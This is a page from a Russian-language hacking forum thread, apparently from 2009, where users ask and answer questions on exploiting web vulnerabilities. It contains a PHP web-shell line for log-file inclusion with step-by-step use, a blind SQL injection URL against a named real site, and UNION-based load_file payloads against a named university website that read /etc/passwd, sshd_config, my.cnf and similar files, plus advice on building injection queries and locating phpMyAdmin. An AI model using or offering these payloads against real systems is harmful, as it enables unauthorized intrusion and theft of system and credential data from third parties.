FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2415 из 2422

2415

Опции темы

Поиск в этой теме

Опции просмотра

21.10.2009, 20:12

bons

Участник форума

Регистрация: 20.12.2007

Сообщений: 295

Провел на форуме:
1777055

Репутация: 347

Цитата:

Сообщение от Strilo4ka

ребята что нам дает файл passwd. В принцыпе в гугде поискать не проблема,а так в 5-ти словах. Знаю что пароля там нет. Там выведено даные о пользователях и слубы или что ??? а пароль в файле shadow наскольку я знаю. Тоэсть не пароль а хешы паролей.

Ctacok , а что разве в mysql 5 версии { скобка это коментарий?

скобка не есть комментарий
файл passwd даст список юзеров системы, а иногда эта информация может помочь.

21.10.2009, 22:49

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

Цитата:

Сообщение от Strilo4ka

AFoST,чисто теоретический вопрос(думаю пост удален не будет): Возможно ли через лог файл поднять привилегии используя эту локальную иньекцию кода на сайте. Интересно все что после ? в URL будет записываться в лог. По умолчанию оно записываеться??? На денверер я обобщаю (апач) кажеться не.... А там допустим прописать <? system($_GET['cmd']); ?>, а потом подключить лог файл передав строку в HEX. И главный когда встретит инструкции PHP кода он их передаст интерпрератору таким образом получиться передавать переменную cmd через гет. А в значение прописывать команды DOS, допустим или linux. Я правц?

Да, это известный прием инклуда лог файла.
1. находим инклуд
2. находим логи /path/log/access_log
3. запрос с cmd на сайт http://site/? ...
4. инклудим через инклуд, найденный в п.1. access_log
http://site/include.php?include=/path/log/acces_log&cmd=ls+-lia

upd ты права таким способом не поднимаешь, ты просто выполняешь php.

ps Изъясняй мысли правильней!!! Я с 5го прочтения тебя понимаю!!!

__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 21.10.2009 в 22:53..

22.10.2009, 19:25

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

Сообщение от DeluxeS

Ошибка такая:
Error in /script.php:Table 'database.tabla' doesn't exist
Что не так? (

Ну во первых tablE
Во вторых, попробуй табличку users.
В третьих, жмяк

22.10.2009, 20:06

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Отправить сообщение для L I G A с помощью ICQ

Цитата:

Сообщение от Ctacok

Ну во первых tablE

мб там таблица имеет название `tabla`

23.10.2009, 12:01

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

Провел на форуме:
950638

Репутация: 256

Отправить сообщение для DrAssault с помощью ICQ

Цитата:

Сообщение от DeluxeS

Ошибка такая:
Error in /script.php:Table 'database.tabla' doesn't exist
Что не так? (

Всё просто, в текущей БД database нет таблицы tabla

Цитата:

Сообщение от Patrik

Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.

_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+

Последний раз редактировалось DrAssault; 23.10.2009 в 12:05..

23.10.2009, 12:13

Patrik

Познающий

Регистрация: 15.01.2006

Сообщений: 45

Провел на форуме:
210499

Репутация: 16

Отправить сообщение для Patrik с помощью ICQ

Цитата:

Сообщение от DrAssault

_ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+

Получается строка user пустая. Где тогда искать?

25.10.2009, 05:02

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от Strilo4ka

блин помогите найти логи какие нибуть на _http://www.univd.edu.ua/.
?>

toolza, 7 пункт главного меню, 6 метод, только гет методом, но там ничего интересного нет:

Код:

 /etc/ssh/sshd_config
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7373682f737368645f636f6e666967),2,3,4,5--+
------------------------------------
  /etc/passwd
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f706173737764),2,3,4,5--+
------------------------------------
  /etc/vsftpd.chroot_list
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e6368726f6f745f6c697374),2,3,4,5--+
------------------------------------
  /etc/my.cnf
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f6d792e636e66),2,3,4,5--+
------------------------------------
  /etc/vsftpd.conf
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e636f6e66),2,3,4,5--+
------------------------------------
  /usr/bin/grep
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f7573722f62696e2f67726570),2,3,4,5--+

а вообще там менты, так что поаккуратней

25.10.2009, 09:03

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

Сообщение от Strilo4ka

возможно ли найти PHPMyAdmin интересно, есть какие нить програмы что его ищут!!!???

http://google.ru/

site:домен_жертвы phpmyadmin

Если админ норм, то ненайдёшь, посмотри у хостера.

25.10.2009, 17:12

keng

Познающий

Регистрация: 09.04.2008

Сообщений: 79

Провел на форуме:
463189

Репутация: 124

Если работает outfile, но файл не прочитать - может просто-напросто прав на чтение нет в этот каталог? О_о

Или то, что записывается - просто глюк.

#10

29.10.2009, 23:27

L I G A

Постоянный

Регистрация: 27.07.2008

Сообщений: 614

Провел на форуме:
4532332

Репутация: 1196

Цитата:

Сообщение от eliteload

-----------------------------------------------------------
"SELECT DISTINCT xxx FROM xxx, xxx WHERE xxx=xxx AND (xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' OR xxx LIKE '%{INJ}%' ) ORDER BY xxx";
-----------------------------------------------------------
помогите составить inj запрос )

?поле1=%'+and+поле2=-false+union+select+количество полей/*

Страница 2415 из 2422

2415

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ